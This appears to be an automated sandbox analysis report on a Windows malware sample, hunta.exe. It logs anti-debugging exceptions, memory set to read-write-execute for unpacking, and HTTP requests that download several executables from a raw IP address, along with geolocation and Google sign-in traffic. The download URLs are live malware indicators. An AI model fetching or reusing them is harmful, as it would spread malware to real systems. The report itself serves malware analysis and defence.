__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb e9 a3 06 00 00 81 cd f1 3e fb 7f 81 ed f5 ea exception.symbol: hunta+0x2e078e exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 3016590 exception.address: 0xfe078e registers.esp: 3734848 registers.edi: 4294940916 registers.eax: 28870 registers.ebp: 4005011476 registers.edx: 1114345 registers.ebx: 16676651 registers.esi: 0 registers.ecx: 1969148396	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: ed 64 8f 05 00 00 00 00 50 89 e0 05 04 00 00 00 exception.symbol: hunta+0x2e631d exception.instruction: in eax, dx exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 3040029 exception.address: 0xfe631d registers.esp: 3734840 registers.edi: 4294940916 registers.eax: 1447909480 registers.ebp: 4005011476 registers.edx: 22104 registers.ebx: 1969033397 registers.esi: 16654435 registers.ecx: 20	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: 0f 3f 07 0b 64 8f 05 00 00 00 00 83 c4 04 83 fb exception.symbol: hunta+0x2e4477 exception.address: 0xfe4477 exception.module: hunta.exe exception.exception_code: 0xc000001d exception.offset: 3032183 registers.esp: 3734840 registers.edi: 4294940916 registers.eax: 1 registers.ebp: 4005011476 registers.edx: 22104 registers.ebx: 0 registers.esi: 16654435 registers.ecx: 20	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: ed 81 fb 68 58 4d 56 75 0a c7 85 a8 38 2d 12 01 exception.symbol: hunta+0x2e53f5 exception.instruction: in eax, dx exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 3036149 exception.address: 0xfe53f5 registers.esp: 3734840 registers.edi: 4294940916 registers.eax: 1447909480 registers.ebp: 4005011476 registers.edx: 22104 registers.ebx: 2256917605 registers.esi: 16654435 registers.ecx: 10	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: cd 01 eb 00 66 8b d7 fc 64 8f 05 00 00 00 00 e9 exception.symbol: hunta+0x2eae27 exception.instruction: int 1 exception.module: hunta.exe exception.exception_code: 0xc0000005 exception.offset: 3059239 exception.address: 0xfeae27 registers.esp: 3734808 registers.edi: 0 registers.eax: 3734808 registers.ebp: 4005011476 registers.edx: 1129970808 registers.ebx: 16691012 registers.esi: 0 registers.ecx: 704938098	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb e9 00 00 00 00 51 89 3c 24 56 be 00 00 00 00 exception.symbol: hunta+0x2ebc5b exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 3062875 exception.address: 0xfebc5b registers.esp: 3734848 registers.edi: 4294940916 registers.eax: 31131 registers.ebp: 4005011476 registers.edx: 2130566132 registers.ebx: 48061359 registers.esi: 16722803 registers.ecx: 2135425024	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb 57 e9 f5 01 00 00 81 c3 26 d3 9d 3f 01 fb 81 exception.symbol: hunta+0x2eb891 exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 3061905 exception.address: 0xfeb891 registers.esp: 3734848 registers.edi: 2283 registers.eax: 31131 registers.ebp: 4005011476 registers.edx: 2130566132 registers.ebx: 48061359 registers.esi: 16722803 registers.ecx: 4294939048	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb e9 9c fd ff ff bf 59 cd cf 7f f7 d7 4f 81 ec exception.symbol: hunta+0x2fb0e2 exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 3125474 exception.address: 0xffb0e2 registers.esp: 3734848 registers.edi: 4294940708 registers.eax: 29558 registers.ebp: 4005011476 registers.edx: 1357285718 registers.ebx: 16784220 registers.esi: 1968968720 registers.ecx: 0	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb 83 ec 04 89 0c 24 51 54 e9 84 00 00 00 01 f9 exception.symbol: hunta+0x2fbebe exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 3129022 exception.address: 0xffbebe registers.esp: 3734848 registers.edi: 4294940708 registers.eax: 4294937916 registers.ebp: 4005011476 registers.edx: 1357285718 registers.ebx: 16790125 registers.esi: 1968968720 registers.ecx: 82608979	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb 50 e9 62 00 00 00 03 0c 24 50 52 e9 9f 00 00 exception.symbol: hunta+0x2fc624 exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 3130916 exception.address: 0xffc624 registers.esp: 3734844 registers.edi: 4294940708 registers.eax: 28837 registers.ebp: 4005011476 registers.edx: 621916022 registers.ebx: 2021205660 registers.esi: 1968968720 registers.ecx: 16761142	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb 83 ec 04 89 2c 24 54 e9 1a 02 00 00 89 f8 8b exception.symbol: hunta+0x2fc88b exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 3131531 exception.address: 0xffc88b registers.esp: 3734848 registers.edi: 4294940708 registers.eax: 28837 registers.ebp: 4005011476 registers.edx: 621916022 registers.ebx: 2021205660 registers.esi: 1968968720 registers.ecx: 16789979	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb 83 ec 04 89 3c 24 89 04 24 c7 04 24 8d 04 f1 exception.symbol: hunta+0x2fca13 exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 3131923 exception.address: 0xffca13 registers.esp: 3734848 registers.edi: 4294941428 registers.eax: 28837 registers.ebp: 4005011476 registers.edx: 621916022 registers.ebx: 2021205660 registers.esi: 262633 registers.ecx: 16789979	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb 83 ec 04 e9 f1 03 00 00 58 81 ec 04 00 00 00 exception.symbol: hunta+0x308999 exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 3180953 exception.address: 0x1008999 registers.esp: 3734836 registers.edi: 16811798 registers.eax: 27868 registers.ebp: 4005011476 registers.edx: 2130566132 registers.ebx: 289964027 registers.esi: 4278394529 registers.ecx: 2135425024	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb 57 e9 4e 00 00 00 8b 14 24 81 c4 04 00 00 00 exception.symbol: hunta+0x308fce exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 3182542 exception.address: 0x1008fce registers.esp: 3734840 registers.edi: 16814810 registers.eax: 27868 registers.ebp: 4005011476 registers.edx: 2130566132 registers.ebx: 0 registers.esi: 4278394529 registers.ecx: 84201	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb 57 c7 04 24 84 d0 d8 0c 89 04 24 b8 04 81 ef exception.symbol: hunta+0x312ed2 exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 3223250 exception.address: 0x1012ed2 registers.esp: 3734836 registers.edi: 908407673 registers.eax: 29640 registers.ebp: 4005011476 registers.edx: 16854034 registers.ebx: 16848758 registers.esi: 908407673 registers.ecx: 16852276	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb 52 54 5a e9 99 ff ff ff 5e 01 c5 ff 34 24 58 exception.symbol: hunta+0x312f4f exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 3223375 exception.address: 0x1012f4f registers.esp: 3734840 registers.edi: 908407673 registers.eax: 4294940692 registers.ebp: 4005011476 registers.edx: 16883674 registers.ebx: 16848758 registers.esi: 908407673 registers.ecx: 1358981728	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb 50 e9 39 00 00 00 54 8f 04 24 81 04 24 04 00 exception.symbol: hunta+0x328fee exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 3313646 exception.address: 0x1028fee registers.esp: 3734804 registers.edi: 280 registers.eax: 32861 registers.ebp: 4005011476 registers.edx: 2130566132 registers.ebx: 16943318 registers.esi: 16938802 registers.ecx: 2135425024	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb 51 52 e9 74 03 00 00 89 34 24 be 6a e5 2c 13 exception.symbol: hunta+0x3289cf exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 3312079 exception.address: 0x10289cf registers.esp: 3734808 registers.edi: 280 registers.eax: 1392536160 registers.ebp: 4005011476 registers.edx: 2130566132 registers.ebx: 16946259 registers.esi: 0 registers.ecx: 2135425024	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb 68 3f a6 a9 63 89 04 24 c7 04 24 da 98 f9 35 exception.symbol: hunta+0x32a193 exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 3318163 exception.address: 0x102a193 registers.esp: 3734808 registers.edi: 16946980 registers.eax: 28868 registers.ebp: 4005011476 registers.edx: 1442867808 registers.ebx: 1537904576 registers.esi: 16976332 registers.ecx: 4294940928	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb 68 da c1 5b 2e e9 6c f8 ff ff 01 d0 5a 2d 04 exception.symbol: hunta+0x32b26c exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 3322476 exception.address: 0x102b26c registers.esp: 3734808 registers.edi: 16946980 registers.eax: 26731 registers.ebp: 4005011476 registers.edx: 1442867808 registers.ebx: 1823103945 registers.esi: 16978682 registers.ecx: 2022168987	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb 83 ec 04 89 3c 24 bf ce b5 bf 6d 83 ec 04 89 exception.symbol: hunta+0x32b50b exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 3323147 exception.address: 0x102b50b registers.esp: 3734808 registers.edi: 80171602 registers.eax: 26731 registers.ebp: 4005011476 registers.edx: 1442867808 registers.ebx: 0 registers.esi: 16954662 registers.ecx: 2022168987	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb 55 56 89 e6 81 c6 04 00 00 00 81 ee 04 00 00 exception.symbol: hunta+0x32bbf3 exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 3324915 exception.address: 0x102bbf3 registers.esp: 3734808 registers.edi: 0 registers.eax: 16958483 registers.ebp: 4005011476 registers.edx: 1173200654 registers.ebx: 1405626539 registers.esi: 16954662 registers.ecx: 951360909	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb 51 e9 00 00 00 00 89 34 24 c7 04 24 33 85 c4 exception.symbol: hunta+0x33226a exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 3351146 exception.address: 0x103226a registers.esp: 3734808 registers.edi: 0 registers.eax: 29151 registers.ebp: 4005011476 registers.edx: 16973358 registers.ebx: 4294941212 registers.esi: 24811 registers.ecx: 17009038	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb 68 51 8f d7 09 89 34 24 be a0 ce df 7f 51 89 exception.symbol: hunta+0x33511b exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 3363099 exception.address: 0x103511b registers.esp: 3734808 registers.edi: 17019985 registers.eax: 27765 registers.ebp: 4005011476 registers.edx: 14337 registers.ebx: 711800833 registers.esi: 17016035 registers.ecx: 14337	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb 68 5a 0b 44 0a e9 f1 02 00 00 5f 68 a6 cd ac exception.symbol: hunta+0x334e88 exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 3362440 exception.address: 0x1034e88 registers.esp: 3734808 registers.edi: 17019985 registers.eax: 605325649 registers.ebp: 4005011476 registers.edx: 14337 registers.ebx: 711800833 registers.esi: 17016035 registers.ecx: 4294942312	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb 83 ec 04 e9 51 f7 ff ff 29 d1 5a 5a 89 ca e9 exception.symbol: hunta+0x335cbb exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 3366075 exception.address: 0x1035cbb registers.esp: 3734804 registers.edi: 17019985 registers.eax: 27694 registers.ebp: 4005011476 registers.edx: 16995338 registers.ebx: 1041317376 registers.esi: 17016035 registers.ecx: 4294942312	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb 68 9b b2 41 16 89 2c 24 52 e9 8b 00 00 00 81 exception.symbol: hunta+0x3357ee exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 3364846 exception.address: 0x10357ee registers.esp: 3734808 registers.edi: 4294942624 registers.eax: 27694 registers.ebp: 4005011476 registers.edx: 17023032 registers.ebx: 1041317376 registers.esi: 81129 registers.ecx: 4294942312	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb e9 d3 01 00 00 f7 d9 87 ce 81 c6 5e c0 aa f4 exception.symbol: hunta+0x33bb35 exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 3390261 exception.address: 0x103bb35 registers.esp: 3734804 registers.edi: 4294942624 registers.eax: 29734 registers.ebp: 4005011476 registers.edx: 2130566132 registers.ebx: 2147483650 registers.esi: 17021216 registers.ecx: 2135425024	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb 29 ff e9 9d f9 ff ff 53 bb ff da 5f 36 81 c3 exception.symbol: hunta+0x33c21f exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 3392031 exception.address: 0x103c21f registers.esp: 3734808 registers.edi: 4294942624 registers.eax: 29734 registers.ebp: 4005011476 registers.edx: 2130566132 registers.ebx: 2147483650 registers.esi: 17050950 registers.ecx: 2135425024	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb bb 31 9e bf 7a e9 00 00 00 00 50 b8 3c 13 f3 exception.symbol: hunta+0x33c58c exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 3392908 exception.address: 0x103c58c registers.esp: 3734808 registers.edi: 4294940796 registers.eax: 4909394 registers.ebp: 4005011476 registers.edx: 2130566132 registers.ebx: 2147483650 registers.esi: 17050950 registers.ecx: 2135425024	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb 57 89 34 24 89 e6 81 c6 04 00 00 00 50 89 2c exception.symbol: hunta+0x33fa70 exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 3406448 exception.address: 0x103fa70 registers.esp: 3734808 registers.edi: 4294940796 registers.eax: 17062084 registers.ebp: 4005011476 registers.edx: 229655028 registers.ebx: 1046367359 registers.esi: 2556759400 registers.ecx: 4294944728	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb 52 e9 54 02 00 00 5a 87 3c 24 8b 24 24 89 34 exception.symbol: hunta+0x359326 exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 3511078 exception.address: 0x1059326 registers.esp: 3734804 registers.edi: 17121317 registers.eax: 27773 registers.ebp: 4005011476 registers.edx: 1039672 registers.ebx: 17102539 registers.esi: 4309256 registers.ecx: 17142252	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb 51 89 3c 24 bf 86 ee f9 7e 81 c7 6e 8e a7 3f exception.symbol: hunta+0x359a36 exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 3512886 exception.address: 0x1059a36 registers.esp: 3734808 registers.edi: 17121317 registers.eax: 27773 registers.ebp: 4005011476 registers.edx: 1039672 registers.ebx: 4294942416 registers.esi: 989238376 registers.ecx: 17170025	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb 55 c7 04 24 0e d4 8b 28 89 1c 24 50 e9 31 f9 exception.symbol: hunta+0x364625 exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 3556901 exception.address: 0x1064625 registers.esp: 3734808 registers.edi: 604292944 registers.eax: 17218340 registers.ebp: 4005011476 registers.edx: 4294937664 registers.ebx: 17162876 registers.esi: 4309256 registers.ecx: 4294938376	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb e9 20 00 00 00 81 e9 5b ae ff 53 81 c1 d5 22 exception.symbol: hunta+0x371181 exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 3608961 exception.address: 0x1071181 registers.esp: 3734804 registers.edi: 0 registers.eax: 32264 registers.ebp: 4005011476 registers.edx: 17238205 registers.ebx: 17207947 registers.esi: 4309256 registers.ecx: 12	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb e9 a7 00 00 00 8b 04 24 e9 be 04 00 00 05 f5 exception.symbol: hunta+0x370d35 exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 3607861 exception.address: 0x1070d35 registers.esp: 3734808 registers.edi: 0 registers.eax: 32264 registers.ebp: 4005011476 registers.edx: 17241373 registers.ebx: 17207947 registers.esi: 0 registers.ecx: 3596682856	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb 68 7e d0 f6 64 e9 05 02 00 00 bd e1 15 d7 21 exception.symbol: hunta+0x3839ab exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 3684779 exception.address: 0x10839ab registers.esp: 3734808 registers.edi: 14018898 registers.eax: 4294943520 registers.ebp: 4005011476 registers.edx: 395049983 registers.ebx: 17341000 registers.esi: 16958743 registers.ecx: 3738837507	1
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: fb e9 07 00 00 00 89 f1 e9 5e f9 ff ff 57 89 14 exception.symbol: hunta+0x384b86 exception.instruction: sti exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 3689350 exception.address: 0x1084b86 registers.esp: 3734808 registers.edi: 14018898 registers.eax: 29492 registers.ebp: 4005011476 registers.edx: 605849941 registers.ebx: 17320953 registers.esi: 16958743 registers.ecx: 0	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (8 events)

suspicious_features	Connection to IP address	suspicious_request	HEAD http://193.233.132.167/cost/fu.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://193.233.132.167/cost/fu.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://193.233.132.167/cost/ladas.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://193.233.132.167/cost/ladas.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://193.233.132.167/cost/niks.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://193.233.132.167/cost/niks.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://193.233.132.167/mine/plaza.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://193.233.132.167/mine/plaza.exe

Performs some HTTP requests (20 events)

request	HEAD http://193.233.132.167/cost/fu.exe
request	GET http://193.233.132.167/cost/fu.exe
request	HEAD http://193.233.132.167/cost/ladas.exe
request	GET http://193.233.132.167/cost/ladas.exe
request	HEAD http://193.233.132.167/cost/niks.exe
request	GET http://193.233.132.167/cost/niks.exe
request	HEAD http://193.233.132.167/mine/plaza.exe
request	GET http://193.233.132.167/mine/plaza.exe
request	GET http://www.maxmind.com/geoip/v2.1/city/me
request	GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
request	GET https://db-ip.com/demo/home.php?s=175.208.134.152
request	GET https://accounts.google.com/
request	GET https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F
request	GET https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=ASKXGp3YMHY7_JfLI5pxj5g-LhYoL6fM6jsZneeb1DWUKOCdBPvkG5tDSra_CxHCJOmUEOwhroM-Dw
request	GET https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=ASKXGp1kePpXDqddz9foOSiEown17TJh7jNAkvSvCTWKTHLdsexHCA2tQb56wvm_z-10OZh1Ii2Rqw&passive=1209600&flowName=WebLiteSignIn&flowEntry=ServiceLogin&dsh=S-33185624%3A1707544026773281
request	GET https://ssl.gstatic.com/images/branding/googlelogo/2x/googlelogo_color_74x24dp.png
request	GET https://accounts.google.com/_/bscframe
request	GET https://accounts.google.com/favicon.ico
request	GET https://accounts.google.com/generate_204?HrB4NA
request	GET https://www.google.com/favicon.ico

Allocates read-write-execute memory (usually to unpack itself) (50 out of 1961 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76faf000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76f20000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 585728 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00d01000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ce0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2536 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00cf0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2536 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2536 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02700000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02810000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02970000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ca0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02db0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02dc0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02dd0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02e20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02e30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02e80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02e90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 2536 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ee0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
